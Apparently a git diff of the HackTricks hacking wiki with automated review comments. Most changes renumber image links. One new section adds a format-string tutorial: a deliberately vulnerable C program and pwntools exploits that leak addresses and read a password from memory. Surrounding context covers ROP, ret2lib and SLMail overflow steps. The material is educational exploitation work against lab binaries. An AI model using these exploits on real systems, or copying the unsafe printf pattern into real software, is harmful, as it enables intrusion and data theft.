Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
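Review bot: the HACKENPROOF heading in this hunk links to `https://bit.ly/3xrrDrL`, a shortened URL that hides the destination from readers and from anyone reviewing the README. The other sponsor headings link directly to the sponsor domain; use the resolved target here as well so the link can be checked by reading it.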
@@ -79,7 +79,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
@@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
### [SerpApi](https://serpapi.com/)
-
+
SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
@@ -126,7 +126,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/SUMMARY.md b/SUMMARY.md
index 989bcca15..9c3525572 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -790,6 +790,8 @@
* [Radio](todo/hardware-hacking/radio.md)
* [JTAG](todo/hardware-hacking/jtag.md)
* [SPI](todo/hardware-hacking/spi.md)
+* [Industrial Control Systems Hacking](todo/industrial-control-systems-hacking/README.md)
+ * [Modbus Protocol](todo/industrial-control-systems-hacking/modbus.md)
* [Radio Hacking](todo/radio-hacking/README.md)
* [Pentesting RFID](todo/radio-hacking/pentesting-rfid.md)
* [Infrared](todo/radio-hacking/infrared.md)
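Review bot: the two added entries link to `todo/industrial-control-systems-hacking/README.md` and `todo/industrial-control-systems-hacking/modbus.md`, so make sure the same commit adds both files, otherwise the navigation gains dead links. Also check that the `Modbus Protocol` line is indented as a child of the new section in the same way the hardware-hacking and radio-hacking children are.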
diff --git a/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
index 71efc8cf3..0beb956c8 100644
--- a/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -34,7 +34,7 @@ The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a
Get the address to the GOT table with: **`objdump -s -j .got ./exec`**
-![](<../../.gitbook/assets/image (118).png>)
+![](<../../.gitbook/assets/image (121).png>)
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
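Review bot: the new link on the `+` line, `image (121).png`, still has empty alt text, so nothing in the markdown confirms it is the `objdump -s -j .got ./exec` output that the preceding sentence refers to. Add alt text naming that output; it documents the figure and makes a wrong image obvious the next time assets are renumbered.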
@@ -42,7 +42,7 @@ Observe how after **loading** the **executable** in GEF you can **see** the **fu
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
-![](<../../.gitbook/assets/image (493).png>)
+![](<../../.gitbook/assets/image (496).png>)
### GOT2Exec
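Review bot: the context sentence above the changed image says "to see the got table" in lower case, while the hunk header text and the next heading write GOT. As a style point, capitalise it as "GOT table" (or just "GOT") so it is not confused with the GEF command `got` named in the same sentence.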
diff --git a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
index 94f370296..94960d06f 100644
--- a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
+++ b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
@@ -181,7 +181,7 @@ gef➤ bt
For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
-![](<../../../.gitbook/assets/image (1058).png>)
+![](<../../../.gitbook/assets/image (1061).png>)
## qtool
@@ -250,7 +250,7 @@ Inside the IDA folder you can find binaries that can be used to debug a binary i
Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
-![](<../../../.gitbook/assets/image (855).png>)
+![](<../../../.gitbook/assets/image (858).png>)
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
index 9a8995c78..c6a40bff6 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
@@ -170,7 +170,7 @@ while True:
pass
```
-
+
### Local Information (`/proc/[pid]/stat`)
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
index 8e2fd1676..cab3e29cf 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
@@ -24,7 +24,7 @@ MTE operates by **dividing memory into small, fixed-size blocks, with each block
When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.
-
+
When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.**
@@ -32,7 +32,7 @@ When a program accesses memory through a pointer, the MTE hardware checks that t
Tags inside a pointer are stored in 4 bits inside the top byte:
-
+
Therefore, this allows up to **16 different tag values**.
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index 6b6438c63..360778c3e 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
-![](<../../../.gitbook/assets/image (862).png>)
+![](<../../../.gitbook/assets/image (865).png>)
{% hint style="info" %}
Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
@@ -93,7 +93,7 @@ INI_SHELLCODE = RBP - 1152
From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
-![](<../../../.gitbook/assets/image (476).png>)
+![](<../../../.gitbook/assets/image (479).png>)
In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000`
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index 9ec377e06..30e52b519 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
-![](<../../../.gitbook/assets/image (862).png>)
+![](<../../../.gitbook/assets/image (865).png>)
{% hint style="info" %}
Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
index 68ef4728b..07f680df6 100644
--- a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -14,7 +14,51 @@ Other ways to support HackTricks:
-## Code
+## Read Binary Start
+
+### Code
+
+```c
+#include
+
+int main(void) {
+ char buffer[30];
+
+ fgets(buffer, sizeof(buffer), stdin);
+
+ printf(buffer);
+ return 0;
+}
+```
+
+Compile it with:
+
+```python
+clang -o fs-read fs-read.c -Wno-format-security -no-pie
+```
+
+### Exploit
+
+```python
+from pwn import *
+
+p = process('./fs-read')
+
+payload = f"%11$s|||||".encode()
+payload += p64(0x00400000)
+
+p.sendline(payload)
+log.info(p.clean())
+```
+
+* The **offset is 11** because setting several As and **brute-forcing** with a loop offsets from 0 to 50 found that at offset 11 and with 5 extra chars (pipes `|` in our case), it's possible to control a full address.
+ * I used **`%11$p`** with padding until I so that the address was all 0x4141414141414141
+* The **format string payload is BEFORE the address** because the **printf stops reading at a null byte**, so if we send the address and then the format string, the printf will never reach the format string as a null byte will be found before
+* The address selected is 0x00400000 because it's where the binary starts (no PIE)
+
+
+
+## Read passwords
```c
#include
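Review bot: the compile command under "Compile it with:" sits in a fence tagged `python` although it is a `clang` shell invocation; tag it `bash` so it highlights and copies correctly. In the added C block the `#include` line carries no header name as rendered here, and `fgets`/`printf` need `<stdio.h>`. The sub-bullet "I used **`%11$p`** with padding until I so that the address was all 0x4141414141414141" is missing words and should be completed. `f"%11$s|||||"` is an f-string with no placeholders, so a plain bytes literal would be clearer.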
@@ -72,25 +116,83 @@ for i in range(100):
In the image it's possible to see that we can leak the password from the stack in the `10th` position:
-
-
-
-
-Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
-
-
-
-
-
-The difference between the leaked address and the address of the password is:
+
+### Read data
+
+Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%25$p`. Moreover, comparing the leaked address (`0xaaaab7030894`) with the position of the password in memory in that process we can obtain the addresses difference:
+
+
+
+Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability:
+
+```python
+from pwn import *
+
+def leak_heap(p):
+ p.sendlineafter(b"first password:", b"%5$p")
+ p.recvline()
+ response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
+ return int(response, 16)
+
+for i in range(30):
+ p = process("./fs-read")
+
+ heap_leak_addr = leak_heap(p)
+ print(f"Leaked heap: {hex(heap_leak_addr)}")
+
+ password_addr = heap_leak_addr - 0x126a
+
+ print(f"Try: {i}")
+ payload = f"%{i}$p|||".encode()
+ payload += b"AAAAAAAA"
+
+ p.sendline(payload)
+ output = p.clean()
+ print(output.decode("utf-8"))
+ p.close()
```
-> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
-$1 = 0x126a
+
+And it's possible to see that in the **try 14** with the used passing we can control an address:
+
+
+
+### Exploit
+
+```python
+from pwn import *
+
+p = process("./fs-read")
+
+def leak_heap(p):
+ # At offset 25 there is a heap leak
+ p.sendlineafter(b"first password:", b"%25$p")
+ p.recvline()
+ response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
+ return int(response, 16)
+
+heap_leak_addr = leak_heap(p)
+print(f"Leaked heap: {hex(heap_leak_addr)}")
+
+# Offset calculated from the leaked position to the possition of the pass in memory
+password_addr = heap_leak_addr + 0x1f7bc
+
+print(f"Calculated address is: {hex(password_addr)}")
+
+# At offset 14 we can control the addres, so use %s to read the string from that address
+payload = f"%14$s|||".encode()
+payload += p64(password_addr)
+
+p.sendline(payload)
+output = p.clean()
+print(output)
+p.close()
```
+
+
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
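Review bot: the brute-force script and the final exploit in this hunk disagree on both constants. `leak_heap` in the loop sends `%5$p`, while the new prose and the final `leak_heap` use `%25$p`. The loop also still computes `password_addr = heap_leak_addr - 0x126a` (never used inside the loop), whereas the final script uses `heap_leak_addr + 0x1f7bc`. The hunk removes the subtraction that derived 0x126a, so neither offset is explained by the text any more. Align the loop with the final script, drop the unused assignment, and say how 0x1f7bc was measured. Typos to fix while here: "with the used passing", "possition", "addres".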
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
index 77f46535a..a93a71e2f 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -87,7 +87,7 @@ gef➤ search-pattern 0x400560
Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
-
+
Check this page for more info:
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
index 4274fda41..1bf4d53bc 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
@@ -122,7 +122,7 @@ done
The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless):
-
+
### Ret2reg
@@ -165,11 +165,11 @@ int main(int argc, char **argv) {
Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow:
-
+
It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function:
-
+
We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be:
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
index 7fdeed733..d10747bae 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
@@ -67,7 +67,7 @@ If the process is creating **children** every time you talk with it (network ser
Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
-![](<../../../.gitbook/assets/image (850).png>)
+![](<../../../.gitbook/assets/image (853).png>)
In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
index 617876660..c770eea31 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
@@ -19,7 +19,7 @@ Other ways to support HackTricks:
[**One Gadget**](https://github.com/david942j/one\_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
-![](<../../../.gitbook/assets/image (751).png>)
+![](<../../../.gitbook/assets/image (754).png>)
```python
ONE_GADGET = libc.address + 0x4526a
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
index 18b356ba1..4cb189990 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
@@ -47,17 +47,17 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
-
+
Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**:
-
+
### Find system and `/bin/sh` string
As the ASLR is disabled, the addresses are going to be always the same:
-
+
### Find Gadgets
@@ -150,11 +150,11 @@ clang -o rop rop.c -fno-stack-protector -Wno-format-security
Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses:
-
+
Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address:
-
+
Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
index 62da79a7f..8e9877f65 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
@@ -80,7 +80,7 @@ from pwn import *
cyclic_find(0x6161616b)
```
-![](<../../../../.gitbook/assets/image (1004).png>)
+![](<../../../../.gitbook/assets/image (1007).png>)
After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
`OFFSET = "A" * 40`
@@ -154,7 +154,7 @@ Finally, **main function is called again** so we can exploit the overflow again.
This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
-![](<../../../../.gitbook/assets/image (1046).png>)
+![](<../../../../.gitbook/assets/image (1049).png>)
As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
But, in a remote exploit case I will explain here how can you find it:
@@ -164,7 +164,7 @@ But, in a remote exploit case I will explain here how can you find it:
You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
It will also allow you to download the discovered version of **libc**
-![](<../../../../.gitbook/assets/image (218).png>)
+![](<../../../../.gitbook/assets/image (221).png>)
### 3.2- Searching for libc version (2)
@@ -260,14 +260,14 @@ Finally, the **address of exit function** is **called** so the process **exists
**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
-![](<../../../../.gitbook/assets/image (162).png>)
+![](<../../../../.gitbook/assets/image (165).png>)
## 4(2)- Using ONE\_GADGET
You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
-![](<../../../../.gitbook/assets/image (751).png>)
+![](<../../../../.gitbook/assets/image (754).png>)
```python
ONE_GADGET = libc.address + 0x4526a
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index f227ade10..97049b6fd 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -236,7 +236,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
BINSH = next(libc.search("/bin/sh")) - 64
```
-
+
{% embed url="https://websec.nl/" %}
diff --git a/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
index a1c1b7538..b3f47008b 100644
--- a/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
+++ b/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
@@ -61,7 +61,7 @@ pattern create 200
run
```
-
+
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
@@ -69,7 +69,7 @@ arm64 will try to return to the address in the register x30 (which was compromis
pattern search $x30
```
-
+
**The offset is 72 (9x48).**
@@ -84,7 +84,7 @@ run
info frame
```
-
+
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
@@ -93,15 +93,15 @@ b *vulnerable_function+28
c
```
-
+
Find where this pattern is stored in memory:
-
+
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
-
+
## No PIE
@@ -137,7 +137,7 @@ print(p.recvline())
p.close()
```
-
+
### Off-by-1
@@ -163,7 +163,7 @@ print(p.recvline())
p.close()
```
-
+
You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
@@ -177,7 +177,7 @@ Compile the binary **without the `-no-pie` argument**
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
-
+
```python
from pwn import *
diff --git a/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
index f87b653b3..ade77e860 100644
--- a/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
@@ -24,7 +24,7 @@ Every time you need to **restart the service SLMail** you can do it using the wi
net start slmail
```
-![](<../.gitbook/assets/image (985).png>)
+![](<../.gitbook/assets/image (988).png>)
## Very basic python exploit template
@@ -58,13 +58,13 @@ Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
**File --> Attach**
-![](<../.gitbook/assets/image (866).png>)
+![](<../.gitbook/assets/image (869).png>)
**And press START button**
## **Send the exploit and check if EIP is affected:**
-![](<../.gitbook/assets/image (903).png>)
+![](<../.gitbook/assets/image (906).png>)
Every time you break the service you should restart it as is indicated in the beginnig of this page.
@@ -72,7 +72,7 @@ Every time you break the service you should restart it as is indicated in the be
The pattern should be as big as the buffer you used to broke the service previously.
-![](<../.gitbook/assets/image (417).png>)
+![](<../.gitbook/assets/image (420).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
@@ -82,11 +82,11 @@ Change the buffer of the exploit and set the pattern and lauch the exploit.
A new crash should appeard, but with a different EIP address:
-![](<../.gitbook/assets/image (633).png>)
+![](<../.gitbook/assets/image (636).png>)
Check if the address was in your pattern:
-![](<../.gitbook/assets/image (415).png>)
+![](<../.gitbook/assets/image (418).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
@@ -102,9 +102,9 @@ buffer = 'A'*2606 + 'BBBB' + 'CCCC'
With this buffer the EIP crashed should point to 42424242 ("BBBB")
-![](<../.gitbook/assets/image (871).png>)
+![](<../.gitbook/assets/image (874).png>)
-![](<../.gitbook/assets/image (89).png>)
+![](<../.gitbook/assets/image (92).png>)
Looks like it is working.
@@ -120,9 +120,9 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600
launch the new exploit and check the EBP and the length of the usefull shellcode
-![](<../.gitbook/assets/image (116).png>)
+![](<../.gitbook/assets/image (119).png>)
-![](<../.gitbook/assets/image (876).png>)
+![](<../.gitbook/assets/image (879).png>)
You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
@@ -162,11 +162,11 @@ For example:
In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
-![](<../.gitbook/assets/image (108).png>)
+![](<../.gitbook/assets/image (111).png>)
In this case you can see that **the char 0x0D is avoided**:
-![](<../.gitbook/assets/image (1095).png>)
+![](<../.gitbook/assets/image (1098).png>)
## Find a JMP ESP as a return address
@@ -184,7 +184,7 @@ You will **list the memory maps**. Search for some DLl that has:
* **NXCompat: False**
* **OS Dll: True**
-![](<../.gitbook/assets/image (552).png>)
+![](<../.gitbook/assets/image (555).png>)
Now, inside this memory you should find some JMP ESP bytes, to do that execute:
@@ -195,7 +195,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
**Then, if some address is found, choose one that don't contain any badchar:**
-![](<../.gitbook/assets/image (602).png>)
+![](<../.gitbook/assets/image (605).png>)
**In this case, for example: \_0x5f4a358f**\_
diff --git a/c2/salseo.md b/c2/salseo.md
index 36ddabe7b..a532bb168 100644
--- a/c2/salseo.md
+++ b/c2/salseo.md
@@ -24,11 +24,11 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\ Properties"**)
-![](<../.gitbook/assets/image (836).png>)
+![](<../.gitbook/assets/image (839).png>)
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
-![](<../.gitbook/assets/image (378).png>)
+![](<../.gitbook/assets/image (381).png>)
## Prepare the Backdoor
@@ -101,17 +101,17 @@ Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport]
-![](<../.gitbook/assets/image (405).png>)
+![](<../.gitbook/assets/image (409).png>)
### Install DllExport for this project
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
-![](<../.gitbook/assets/image (878).png>)
+![](<../.gitbook/assets/image (881).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
-![](<../.gitbook/assets/image (97).png>)
+![](<../.gitbook/assets/image (100).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
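Review bot: the first image reference in this hunk moves from `image (405).png` to `image (409).png`, a shift of 4, while the other two here move by 3 (878 to 881, 97 to 100). Please confirm that 409 is the screenshot showing `[DllExport]` before the main function and not a neighbouring asset picked up by the bulk renumbering.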
@@ -119,7 +119,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
-![](<../.gitbook/assets/image (94).png>)
+![](<../.gitbook/assets/image (97).png>)
### **Exit Visual Studio and execute DllExport\_configure**
@@ -129,23 +129,23 @@ Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat*
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
-![](<../.gitbook/assets/image (879).png>)
+![](<../.gitbook/assets/image (882).png>)
### **Open the project again with visual Studio**
**\[DllExport]** should not be longer marked as error
-![](<../.gitbook/assets/image (667).png>)
+![](<../.gitbook/assets/image (670).png>)
### Build the solution
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
-![](<../.gitbook/assets/image (844).png>)
+![](<../.gitbook/assets/image (847).png>)
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
-![](<../.gitbook/assets/image (282).png>)
+![](<../.gitbook/assets/image (285).png>)
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
diff --git a/consumer b/consumer
new file mode 100755
index 000000000..637af6e1a
Binary files /dev/null and b/consumer differ
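Review bot: `consumer` is a compiled executable (new file mode 100755, binary diff) added at the repository root. A build artifact cannot be reviewed from the diff, and the `// gcc consumer.c -o consumer -lrt` comment in consumer.c already says how to rebuild it. Drop the binary from the commit and ignore it; if the source is meant as a documentation example, it belongs in the page that discusses it rather than at the root.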
diff --git a/consumer.c b/consumer.c
new file mode 100644
index 000000000..06e10761f
--- /dev/null
+++ b/consumer.c
@@ -0,0 +1,37 @@
+// gcc consumer.c -o consumer -lrt
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main() {
+ const char *name = "/my_shared_memory";
+ const int SIZE = 4096; // Size of the shared memory object
+
+ // Open the shared memory object
+ int shm_fd = shm_open(name, O_RDONLY, 0666);
+ if (shm_fd == -1) {
+ perror("shm_open");
+ return EXIT_FAILURE;
+ }
+
+ // Memory map the shared memory
+ void *ptr = mmap(0, SIZE, PROT_READ, MAP_SHARED, shm_fd, 0);
+ if (ptr == MAP_FAILED) {
+ perror("mmap");
+ return EXIT_FAILURE;
+ }
+
+ // Read from the shared memory
+ printf("Consumer received: %s\n", (char *)ptr);
+
+ // Cleanup
+ munmap(ptr, SIZE);
+ close(shm_fd);
+ shm_unlink(name); // Optionally unlink
+
+ return 0;
+}
+
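Review bot: `printf("Consumer received: %s\n", (char *)ptr);` treats the mapping as a C string, but nothing in this file guarantees a NUL byte inside the 4096-byte mapping, so a producer that fills the object makes the read run past it. Bound the read, for example `%.*s` with `SIZE`, or copy into a local buffer and terminate it. The `mmap` failure path returns without closing `shm_fd`. `shm_unlink(name)` runs unconditionally even though the comment calls it optional; a read-only consumer that removes the name breaks any later consumer and can race the producer. The mode argument `0666` has no effect without `O_CREAT` and can be dropped.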
diff --git a/crypto-and-stego/certificates.md b/crypto-and-stego/certificates.md
index 40a043614..bb4c4ec84 100644
--- a/crypto-and-stego/certificates.md
+++ b/crypto-and-stego/certificates.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
## What is a Certificate
@@ -196,13 +196,13 @@ openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certif
***
-
+
\
